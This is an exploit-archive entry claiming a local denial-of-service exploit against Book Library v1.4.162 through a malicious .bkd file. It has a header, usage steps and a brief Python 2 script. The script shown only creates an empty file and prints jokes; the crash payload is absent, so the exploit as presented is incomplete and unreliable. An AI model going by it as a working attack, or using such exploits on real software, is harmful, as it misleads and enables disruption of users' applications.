Book Library version 1.4.162 local denial of service exploit that creates a malicious .bkd file.
# Exploit Title: Book Library Local Dos .bkd file
# Date: April 14, 2010
# Software Link: []
# Version: v1.4.162
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
# Site: []
# Click Open at top ->
# Find your .bkd file
# No Response about 5 sec
# Greetz Daddas, Exploit-DB crew
# I'ts hard to concentrate with echo's of your voice in my head.
#!/usr/bin/env python
import time
print "The Encyclopedia of Unsolved Mysteries\n"
book=open('unsolved.bkd', 'w')
print "UFO's, Atlantis, Nessie, Oh My!\n"